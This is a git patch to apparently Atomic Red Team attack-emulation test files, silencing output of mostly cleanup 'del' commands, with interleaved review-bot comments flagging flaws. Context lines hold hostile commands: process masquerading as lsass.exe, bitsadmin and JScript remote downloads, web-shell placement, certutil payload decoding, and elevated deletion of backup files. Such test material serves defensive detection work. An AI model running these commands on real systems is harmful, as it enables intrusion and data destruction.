From 3fa4dd1c9e28a3fdbfdd570235cabffa4f85ea64 Mon Sep 17 00:00:00 2001
From: JrOrOneEquals1 <49999278+JrOrOneEquals1@users.noreply.github.com>
Date: Tue, 10 Mar 2020 17:06:14 -0600
Subject: [PATCH] Fixed cleanup commands (#869)
Co-authored-by: Carrie Roberts
---
 atomics/T1036/T1036.yaml | 12 ++++++------
 atomics/T1038/T1038.yaml | 4 ++--
 atomics/T1055/T1055.yaml | 4 ++--
 atomics/T1064/T1064.yaml | 2 +-
 atomics/T1071/T1071.yaml | 2 +-
 atomics/T1100/T1100.yaml | 2 +-
 atomics/T1102/T1102.yaml | 2 +-
 atomics/T1105/T1105.yaml | 4 ++--
 atomics/T1107/T1107.yaml | 2 +-
 atomics/T1114/T1114.yaml | 2 +-
 atomics/T1115/T1115.yaml | 2 +-
 atomics/T1119/T1119.yaml | 8 ++++----
 atomics/T1121/T1121.yaml | 6 +++---
 atomics/T1140/T1140.yaml | 8 ++++----
 atomics/T1145/T1145.yaml | 2 +-
 atomics/T1158/T1158.yaml | 6 +++---
 atomics/T1197/T1197.yaml | 2 +-
 atomics/T1485/T1485.yaml | 2 +-
 atomics/T1500/T1500.yaml | 2 +-
 19 files changed, 37 insertions(+), 37 deletions(-)
diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml
index 1900e80e0d..c7f0fb5a84 100644
--- a/atomics/T1036/T1036.yaml
+++ b/atomics/T1036/T1036.yaml
@@ -17,7 +17,7 @@ atomic_tests:
 cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
 cmd.exe /c %SystemRoot%\Temp\lsass.exe
 cleanup_command: |
- del /Q /F %SystemRoot%\Temp\lsass.exe
+ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 - name: Masquerading as Linux crond process.
 description: |
@@ -47,7 +47,7 @@ atomic_tests:
 copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
 cmd.exe /c %APPDATA%\notepad.exe /B
 cleanup_command: |
- del /Q /F %APPDATA%\notepad.exe
+ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
 - name: Masquerading - wscript.exe running as svchost.exe
 description: |
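Review bot: Redirecting stderr to nul on the cleanup `del` silences the "Could Not Find" message when cleanup runs before the test, but it silences a real failure just as thoroughly — an access-denied or file-in-use error on `%SystemRoot%\Temp\lsass.exe` would leave the renamed cmd.exe on the host with nothing in the executor's output to show it. Guarding on existence keeps that signal while still suppressing the no-op case: `if exist %SystemRoot%\Temp\lsass.exe del /Q /F %SystemRoot%\Temp\lsass.exe`. The same trade-off applies to every other cleanup_command hunk in this patch (the remaining T1036 hunks and T1038, T1055, T1064, T1071, T1100, T1102, T1114, T1115, T1119, T1121, T1140, T1145, T1158, T1197 and T1500).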
@@ -63,7 +63,7 @@ atomic_tests:
 copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
 cmd.exe /c %APPDATA%\svchost.exe /B
 cleanup_command: |
- del /Q /F %APPDATA%\svchost.exe
+ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 - name: Masquerading - powershell.exe running as taskhostw.exe
 description: |
@@ -79,7 +79,7 @@ atomic_tests:
 copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
 cmd.exe /K %APPDATA%\taskhostw.exe
 cleanup_command: |
- del /Q /F %APPDATA%\taskhostw.exe
+ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
 - name: Masquerading - non-windows exe running as windows exe
 description: |
@@ -159,5 +159,5 @@ atomic_tests:
 copy C:\Windows\System32\cmd.exe C:\lsm.exe
 C:\lsm.exe /c echo T1036 > C:\T1036.txt
 cleanup_command: |
- del C:\T1036.txt
- del C:\lsm.exe
+ del C:\T1036.txt >nul 2>&1
+ del C:\lsm.exe >nul 2>&1
diff --git a/atomics/T1038/T1038.yaml b/atomics/T1038/T1038.yaml
index 2b706b058a..6e7e7960f9 100644
--- a/atomics/T1038/T1038.yaml
+++ b/atomics/T1038/T1038.yaml
@@ -18,5 +18,5 @@ atomic_tests:
 copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
 %APPDATA%\updater.exe -Command exit
 cleanup_command: |
- del %APPDATA%\updater.exe
- del %APPDATA%\amsi.dll
+ del %APPDATA%\updater.exe >nul 2>&1
+ del %APPDATA%\amsi.dll >nul 2>&1
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index 5506b536b1..4bdac8c969 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -130,6 +130,6 @@ atomic_tests:
 copy C:\Windows\System32\cmd.exe C:\svchost.exe
 C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
 cleanup_command: |
- del C:\T1055.txt
- del C:\svchost.exe
+ del C:\T1055.txt >nul 2>&1
+ del C:\svchost.exe >nul 2>&1
diff --git a/atomics/T1064/T1064.yaml b/atomics/T1064/T1064.yaml
index a4b89a47f2..93ee5c055e 100644
--- a/atomics/T1064/T1064.yaml
+++ b/atomics/T1064/T1064.yaml
@@ -44,4 +44,4 @@ atomic_tests:
 C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
 C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
 cleanup_command: |
- del #{script_to_create}
+ del #{script_to_create} >nul 2>&1
diff --git a/atomics/T1071/T1071.yaml b/atomics/T1071/T1071.yaml
index 30194f62d1..ef612c4084 100644
--- a/atomics/T1071/T1071.yaml
+++ b/atomics/T1071/T1071.yaml
@@ -210,4 +210,4 @@ atomic_tests:
 echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
 cscript //E:Jscript #{script_file}
 cleanup_command: |
- del #{script_file} /F /Q
+ del #{script_file} /F /Q >nul 2>&1
diff --git a/atomics/T1100/T1100.yaml b/atomics/T1100/T1100.yaml
index afd4ce5d68..c730652d5a 100644
--- a/atomics/T1100/T1100.yaml
+++ b/atomics/T1100/T1100.yaml
@@ -37,4 +37,4 @@ atomic_tests:
 command: |
 xcopy #{web_shells} #{web_shell_path}
 cleanup_command: |
- del #{web_shell_path}
+ del #{web_shell_path} >nul 2>&1
diff --git a/atomics/T1102/T1102.yaml b/atomics/T1102/T1102.yaml
index 9ca998e0ec..e029ba49f5 100644
--- a/atomics/T1102/T1102.yaml
+++ b/atomics/T1102/T1102.yaml
@@ -14,7 +14,7 @@ atomic_tests:
 command: |
 bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
 cleanup_command: |
- del %TEMP%\bitsadmindownload.html
+ del %TEMP%\bitsadmindownload.html >nul 2>&1
 - name: Reach out to C2 Pointer URLs via powershell
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index cbb7dccab2..fbe8ebf05b 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -276,7 +276,7 @@ atomic_tests:
 pushd #{destination_path}
 echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
 CScript.exe AtomicTestT1105.js //E:JScript
- del AtomicTestT1105.js /Q
- del AtomicTestFileT1105.js /Q
+ del AtomicTestT1105.js /Q >nul 2>&1
+ del AtomicTestFileT1105.js /Q >nul 2>&1
 popd
\ No newline at end of file
diff --git a/atomics/T1107/T1107.yaml b/atomics/T1107/T1107.yaml
index 9e4a742f4b..70ec53da4a 100644
--- a/atomics/T1107/T1107.yaml
+++ b/atomics/T1107/T1107.yaml
@@ -60,7 +60,7 @@ atomic_tests:
 elevation_required: false
 command: |
 echo "T1107" > %temp%\T1107.txt
- del /f %temp%\T1107.txt
+ del /f %temp%\T1107.txt >nul 2>&1
 - name: Delete an entire folder - Windows cmd
 description: |
diff --git a/atomics/T1114/T1114.yaml b/atomics/T1114/T1114.yaml
index d9bdd267b9..0e30478ddb 100644
--- a/atomics/T1114/T1114.yaml
+++ b/atomics/T1114/T1114.yaml
@@ -22,4 +22,4 @@ atomic_tests:
 command: |
 powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
 cleanup_command: |
- del #{output_file}
+ del #{output_file} >nul 2>&1
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index c7e24d13d9..22e59ce08b 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
@@ -17,7 +17,7 @@ atomic_tests:
 echo "T1115" > %temp%\T1115.txt
 clip < %temp%\T1115.txt
 cleanup_command: |
- del %temp%\T1115.txt
+ del %temp%\T1115.txt >nul 2>&1
 - name: PowerShell
 description: |
diff --git a/atomics/T1119/T1119.yaml b/atomics/T1119/T1119.yaml
index c92b9cf8b7..5835817c41 100644
--- a/atomics/T1119/T1119.yaml
+++ b/atomics/T1119/T1119.yaml
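Review bot: The redirected `del /f %temp%\T1107.txt` in the T1107 hunk is the test's own `command:` (the context shows `command: |` and the preceding `echo`), not a cleanup_command, so the change suppresses the output of the very action the test exercises and the executor can no longer see whether the deletion succeeded. Since the subject limits the patch to cleanup commands, this line should probably stay as `del /f %temp%\T1107.txt`. The T1485 hunk does the same to its `del /s /f /q ...` test command under `elevation_required: true`, where a silent failure is equally invisible.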
@@ -60,7 +60,7 @@ atomic_tests:
 wmic process list > %TEMP%\T1119_3.txt
 tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
 cleanup_command: |
- del %TEMP%\T1119_1.txt >$null 2>&1
- del %TEMP%\T1119_2.txt >$null 2>&1
- del %TEMP%\T1119_3.txt >$null 2>&1
- del %TEMP%\T1119_4.txt >$null 2>&1
\ No newline at end of file
+ del %TEMP%\T1119_1.txt >nul 2>&1
+ del %TEMP%\T1119_2.txt >nul 2>&1
+ del %TEMP%\T1119_3.txt >nul 2>&1
+ del %TEMP%\T1119_4.txt >nul 2>&1
\ No newline at end of file
diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml
index 4435c8fd09..05f2ee4379 100644
--- a/atomics/T1121/T1121.yaml
+++ b/atomics/T1121/T1121.yaml
@@ -35,7 +35,7 @@ atomic_tests:
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
 cleanup_command: |
- del #{file_name}
+ del #{file_name} >nul 2>&1
 - name: Regsvs Uninstall Method Call Test
 description: |
@@ -72,5 +72,5 @@ atomic_tests:
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
 cleanup_command: |
- del #{file_name} >$null 2>&1
- del key.snk >$null 2>&1
\ No newline at end of file
+ del #{file_name} >nul 2>&1
+ del key.snk >nul 2>&1
\ No newline at end of file
diff --git a/atomics/T1140/T1140.yaml b/atomics/T1140/T1140.yaml
index f048094b5e..60c8d1c77f 100644
--- a/atomics/T1140/T1140.yaml
+++ b/atomics/T1140/T1140.yaml
@@ -20,8 +20,8 @@ atomic_tests:
 certutil -encode #{executable} %temp%\T1140_calc.txt
 certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
 cleanup_command: |
- del %temp%\T1140_calc.txt
- del %temp%T1140_calc_decoded.exe
+ del %temp%\T1140_calc.txt >nul 2>&1
+ del %temp%T1140_calc_decoded.exe >nul 2>&1
 - name: Certutil Rename and Decode
 description: |
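Review bot: `%temp%T1140_calc_decoded.exe` in the added cleanup line of the T1140 hunk (and in the context `certutil -decode` line above it) is missing the backslash after `%temp%`, so the decoded executable presumably lands beside the temp directory with `Temp` prefixed to its name rather than inside it, and with `>nul 2>&1` a cleanup failure on that path is now also silent. Both lines should use the separator: `certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe` and `del %temp%\T1140_calc_decoded.exe >nul 2>&1`.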
@@ -40,5 +40,5 @@ atomic_tests:
 copy %windir%\system32\certutil.exe %temp%\tcm.tmp
 %temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt
 cleanup_command: |
- del %temp%\tcm.tmp
- del %temp%\T1140.txt
+ del %temp%\tcm.tmp >nul 2>&1
+ del %temp%\T1140.txt >nul 2>&1
diff --git a/atomics/T1145/T1145.yaml b/atomics/T1145/T1145.yaml
index bd0106a397..437a15240e 100644
--- a/atomics/T1145/T1145.yaml
+++ b/atomics/T1145/T1145.yaml
@@ -16,7 +16,7 @@ atomic_tests:
 echo "ATOMICREDTEAM" > %windir%\cert.key
 dir c:\ /b /s .key | findstr /e .key
 cleanup_command: |
- del c:\Windows\cert.key
+ del c:\Windows\cert.key >nul 2>&1
 - name: Discover Private SSH Keys
 description: |
diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml
index d67cf4c55e..2607c314d1 100644
--- a/atomics/T1158/T1158.yaml
+++ b/atomics/T1158/T1158.yaml
@@ -41,7 +41,7 @@ atomic_tests:
 echo T1158 > %TEMP%\T1158.txt
 attrib.exe +s %TEMP%\T1158.txt
 cleanup_command: |
- del /A:S %TEMP%\T1158.txt
+ del /A:S %TEMP%\T1158.txt >nul 2>&1
 - name: Create Windows Hidden File with Attrib
 description: |
@@ -55,7 +55,7 @@ atomic_tests:
 echo T1158_hidden > %TEMP%\T1158_hidden.txt
 attrib.exe +h %TEMP%\T1158_hidden.txt
 cleanup_command: |
- del /A:H %TEMP%\T1158_hidden.txt
+ del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
 - name: Hidden files
 description: |
@@ -122,7 +122,7 @@ atomic_tests:
 echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
 for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
 cleanup_command: |
- del #{file_name}
+ del #{file_name} >nul 2>&1
 - name: Create ADS PowerShell
 description: |
diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index 74ab6fcb89..5dab057bc0 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
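Review bot: The cleanup in the T1145 hunk deletes `c:\Windows\cert.key`, while the command line above it creates the file as `%windir%\cert.key`; on a host whose Windows directory is not `C:\Windows` the cleanup misses the file, and after this change it does so silently. Using the same variable in both places removes the mismatch: `del %windir%\cert.key >nul 2>&1`.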
@@ -24,7 +24,7 @@ atomic_tests:
 command: |
 bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
 cleanup_command: |
- del #{local_file}
+ del #{local_file} >nul 2>&1
 - name: Download & Execute via PowerShell BITS
 description: |
diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml
index 235473a71a..8b1708b2d7 100644
--- a/atomics/T1485/T1485.yaml
+++ b/atomics/T1485/T1485.yaml
@@ -101,4 +101,4 @@ atomic_tests:
 name: command_prompt
 elevation_required: true
 command: |
- del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
diff --git a/atomics/T1500/T1500.yaml b/atomics/T1500/T1500.yaml
index 43139ba75d..8475e4ed78 100644
--- a/atomics/T1500/T1500.yaml
+++ b/atomics/T1500/T1500.yaml
@@ -37,4 +37,4 @@ atomic_tests:
 command: |
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
 cleanup_command: |
- del #{output_file}
\ No newline at end of file
+ del #{output_file} >nul 2>&1
\ No newline at end of file